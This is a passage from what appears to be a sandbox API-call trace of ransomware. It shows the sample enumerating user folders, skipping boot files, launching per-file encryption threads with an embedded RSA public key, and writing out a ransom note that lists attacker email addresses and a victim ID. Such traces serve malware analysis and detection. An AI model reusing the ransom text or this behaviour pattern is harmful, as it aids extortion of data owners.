param_1="C:\\Users\\Default\\Recent\\_HELP_INSTRUCTION.TXT") returned 45 [0139.945] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0139.945] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0139.945] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x7f4) returned 0x0 [0139.945] RegQueryValueExW (in: hKey=0x7f4, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3d02cb8, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x3d02cb8*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0139.945] RegCloseKey (hKey=0x7f4) returned 0x0 [0139.945] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0139.945] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0139.945] CreateFileW (lpFileName="C:\\Users\\Default\\Recent\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\recent\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0139.946] CreateFileW (lpFileName="C:\\Users\\Default\\Recent\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\recent\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0139.948] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Recent\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0139.948] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0139.948] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0139.948] lstrcmpW (lpString1="Saved Games", lpString2="..") returned 1 [0139.948] lstrcmpW (lpString1="Saved Games", lpString2=".") returned 1 [0139.948] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default" [0139.948] lstrcatW (in: lpString1="C:\\Users\\Default", lpString2="\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0139.948] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Saved Games" | out: lpString1="C:\\Users\\Default\\Saved Games") returned="C:\\Users\\Default\\Saved Games" [0139.948] SetErrorMode (uMode=0x1) returned 0x1 [0139.948] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Saved Games" | out: lpString1="C:\\Users\\Default\\Saved Games") returned="C:\\Users\\Default\\Saved Games" [0139.948] lstrcatW (in: lpString1="C:\\Users\\Default\\Saved Games", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Saved Games\\") returned="C:\\Users\\Default\\Saved Games\\" [0139.948] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Default\\Saved Games\\" | out: lpString1="C:\\Users\\Default\\Saved Games\\") returned="C:\\Users\\Default\\Saved Games\\" [0139.948] lstrcatW (in: lpString1="C:\\Users\\Default\\Saved Games\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\Saved Games\\*.*") returned="C:\\Users\\Default\\Saved Games\\*.*" [0139.948] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Saved Games\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3a6290 [0139.949] PathFindFileNameW (pszPath="C:\\Users\\Default\\Saved Games") returned="Saved Games" [0139.949] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Saved Games" | out: lpString1="Saved Games") returned="Saved Games" [0139.949] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0139.949] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0139.949] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0139.949] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0139.949] StrStrW (lpFirst="desktop.ini", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0139.949] StrStrW (lpFirst="desktop.ini", lpSrch="ntldr") returned 0x0 [0139.949] StrStrW (lpFirst="desktop.ini", lpSrch="NTLDR") returned 0x0 [0139.949] StrStrW (lpFirst="desktop.ini", lpSrch="NTDETECT.COM") returned 0x0 [0139.949] StrStrW (lpFirst="desktop.ini", lpSrch="ntdetect.com") returned 0x0 [0139.949] StrStrW (lpFirst="C:\\Users\\Default\\Saved Games\\", lpSrch="Desktop") returned 0x0 [0139.949] StrStrW (lpFirst="C:\\Users\\Default\\Saved Games\\", lpSrch="DESKTOP") returned 0x0 [0139.949] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Saved Games\\") returned 33 [0139.949] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0139.949] lstrcpyW (in: lpString1=0x17cf1c, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0139.949] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\Default\\Saved Games\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Saved Games\\") returned="\\\\?\\C:\\Users\\Default\\Saved Games\\" [0139.949] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x7f8 [0139.949] Sleep (dwMilliseconds=0x96) [0140.093] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0140.093] FindClose (in: hFindFile=0x3a6290 | out: hFindFile=0x3a6290) returned 1 [0140.093] FindClose (in: hFindFile=0x3a6290 | out: hFindFile=0x3a6290) returned 0 [0140.094] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Saved Games" | out: lpString1="C:\\Users\\Default\\Saved Games") returned="C:\\Users\\Default\\Saved Games" [0140.094] lstrcatW (in: lpString1="C:\\Users\\Default\\Saved Games", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\Saved Games\\*.*") returned="C:\\Users\\Default\\Saved Games\\*.*" [0140.094] StrStrW (lpFirst="C:\\Users\\Default\\Saved Games\\", lpSrch="Desktop") returned 0x0 [0140.094] StrStrW (lpFirst="C:\\Users\\Default\\Saved Games\\", lpSrch="DESKTOP") returned 0x0 [0140.094] SetErrorMode (uMode=0x1) returned 0x1 [0140.094] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Default\\Saved Games\\_HELP_INSTRUCTION.TXT") returned 50 [0140.094] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0140.094] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0140.094] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x7fc) returned 0x0 [0140.094] RegQueryValueExW (in: hKey=0x7fc, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3d02ee8, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x3d02ee8*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0140.094] RegCloseKey (hKey=0x7fc) returned 0x0 [0140.094] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0140.094] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0140.094] CreateFileW (lpFileName="C:\\Users\\Default\\Saved Games\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\saved games\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0140.094] CreateFileW (lpFileName="C:\\Users\\Default\\Saved Games\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\saved games\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0140.095] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Saved Games\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3a6290 [0140.095] PathFindFileNameW (pszPath="C:\\Users\\Default\\Saved Games") returned="Saved Games" [0140.095] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Saved Games" | out: lpString1="Saved Games") returned="Saved Games" [0140.095] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0140.095] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0140.095] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0140.095] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0140.095] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0140.095] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0140.095] FindClose (in: hFindFile=0x3a6290 | out: hFindFile=0x3a6290) returned 1 [0140.095] FindClose (in: hFindFile=0x3a6290 | out: hFindFile=0x3a6290) returned 0 [0140.095] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0140.095] lstrcmpW (lpString1="Searches", lpString2="..") returned 1 [0140.095] lstrcmpW (lpString1="Searches", lpString2=".") returned 1 [0140.095] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default" [0140.095] lstrcatW (in: lpString1="C:\\Users\\Default", lpString2="\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0140.095] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Searches" | out: lpString1="C:\\Users\\Default\\Searches") returned="C:\\Users\\Default\\Searches" [0140.095] SetErrorMode (uMode=0x1) returned 0x1 [0140.095] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Searches" | out: lpString1="C:\\Users\\Default\\Searches") returned="C:\\Users\\Default\\Searches" [0140.095] lstrcatW (in: lpString1="C:\\Users\\Default\\Searches", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Searches\\") returned="C:\\Users\\Default\\Searches\\" [0140.095] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Default\\Searches\\" | out: lpString1="C:\\Users\\Default\\Searches\\") returned="C:\\Users\\Default\\Searches\\" [0140.095] lstrcatW (in: lpString1="C:\\Users\\Default\\Searches\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\Searches\\*.*") returned="C:\\Users\\Default\\Searches\\*.*" [0140.095] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Searches\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3a6290 [0140.097] PathFindFileNameW (pszPath="C:\\Users\\Default\\Searches") returned="Searches" [0140.097] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Searches" | out: lpString1="Searches") returned="Searches" [0140.097] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0140.097] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0140.097] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0140.097] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0140.097] StrStrW (lpFirst="desktop.ini", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0140.097] StrStrW (lpFirst="desktop.ini", lpSrch="ntldr") returned 0x0 [0140.097] StrStrW (lpFirst="desktop.ini", lpSrch="NTLDR") returned 0x0 [0140.097] StrStrW (lpFirst="desktop.ini", lpSrch="NTDETECT.COM") returned 0x0 [0140.097] StrStrW (lpFirst="desktop.ini", lpSrch="ntdetect.com") returned 0x0 [0140.097] StrStrW (lpFirst="C:\\Users\\Default\\Searches\\", lpSrch="Desktop") returned 0x0 [0140.097] StrStrW (lpFirst="C:\\Users\\Default\\Searches\\", lpSrch="DESKTOP") returned 0x0 [0140.097] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Searches\\") returned 30 [0140.097] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0140.097] lstrcpyW (in: lpString1=0x17cf1c, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0140.097] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\Default\\Searches\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Searches\\") returned="\\\\?\\C:\\Users\\Default\\Searches\\" [0140.097] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x808 [0140.097] Sleep (dwMilliseconds=0x96) [0140.250] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0140.250] lstrcmpW (lpString1="Everywhere.search-ms", lpString2="..") returned 1 [0140.250] lstrcmpW (lpString1="Everywhere.search-ms", lpString2=".") returned 1 [0140.250] StrStrW (lpFirst="Everywhere.search-ms", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0140.250] StrStrW (lpFirst="Everywhere.search-ms", lpSrch="ntldr") returned 0x0 [0140.250] StrStrW (lpFirst="Everywhere.search-ms", lpSrch="NTLDR") returned 0x0 [0140.250] StrStrW (lpFirst="Everywhere.search-ms", lpSrch="NTDETECT.COM") returned 0x0 [0140.250] StrStrW (lpFirst="Everywhere.search-ms", lpSrch="ntdetect.com") returned 0x0 [0140.250] StrStrW (lpFirst="C:\\Users\\Default\\Searches\\", lpSrch="Desktop") returned 0x0 [0140.250] StrStrW (lpFirst="C:\\Users\\Default\\Searches\\", lpSrch="DESKTOP") returned 0x0 [0140.250] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Searches\\") returned 30 [0140.250] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0140.250] lstrcpyW (in: lpString1=0x17cf1c, lpString2="Everywhere.search-ms" | out: lpString1="Everywhere.search-ms") returned="Everywhere.search-ms" [0140.250] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\Default\\Searches\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Searches\\") returned="\\\\?\\C:\\Users\\Default\\Searches\\" [0140.250] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x80c [0140.251] Sleep (dwMilliseconds=0x96) [0140.405] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0140.405] lstrcmpW (lpString1="Indexed Locations.search-ms", lpString2="..") returned 1 [0140.405] lstrcmpW (lpString1="Indexed Locations.search-ms", lpString2=".") returned 1 [0140.405] StrStrW (lpFirst="Indexed Locations.search-ms", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0140.405] StrStrW (lpFirst="Indexed Locations.search-ms", lpSrch="ntldr") returned 0x0 [0140.406] StrStrW (lpFirst="Indexed Locations.search-ms", lpSrch="NTLDR") returned 0x0 [0140.406] StrStrW (lpFirst="Indexed Locations.search-ms", lpSrch="NTDETECT.COM") returned 0x0 [0140.406] StrStrW (lpFirst="Indexed Locations.search-ms", lpSrch="ntdetect.com") returned 0x0 [0140.406] StrStrW (lpFirst="C:\\Users\\Default\\Searches\\", lpSrch="Desktop") returned 0x0 [0140.406] StrStrW (lpFirst="C:\\Users\\Default\\Searches\\", lpSrch="DESKTOP") returned 0x0 [0140.406] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Searches\\") returned 30 [0140.406] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0140.406] lstrcpyW (in: lpString1=0x17cf1c, lpString2="Indexed Locations.search-ms" | out: lpString1="Indexed Locations.search-ms") returned="Indexed Locations.search-ms" [0140.406] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\Default\\Searches\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Searches\\") returned="\\\\?\\C:\\Users\\Default\\Searches\\" [0140.406] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x810 [0140.406] Sleep (dwMilliseconds=0x96) [0140.561] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0140.561] FindClose (in: hFindFile=0x3a6290 | out: hFindFile=0x3a6290) returned 1 [0140.562] FindClose (in: hFindFile=0x3a6290 | out: hFindFile=0x3a6290) returned 0 [0140.562] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Searches" | out: lpString1="C:\\Users\\Default\\Searches") returned="C:\\Users\\Default\\Searches" [0140.562] lstrcatW (in: lpString1="C:\\Users\\Default\\Searches", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\Searches\\*.*") returned="C:\\Users\\Default\\Searches\\*.*" [0140.562] StrStrW (lpFirst="C:\\Users\\Default\\Searches\\", lpSrch="Desktop") returned 0x0 [0140.562] StrStrW (lpFirst="C:\\Users\\Default\\Searches\\", lpSrch="DESKTOP") returned 0x0 [0140.562] SetErrorMode (uMode=0x1) returned 0x1 [0140.562] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Default\\Searches\\_HELP_INSTRUCTION.TXT") returned 47 [0140.562] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0140.563] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0140.563] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x814) returned 0x0 [0140.563] RegQueryValueExW (in: hKey=0x814, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3d03118, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x3d03118*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0140.563] RegCloseKey (hKey=0x814) returned 0x0 [0140.563] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0140.563] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! 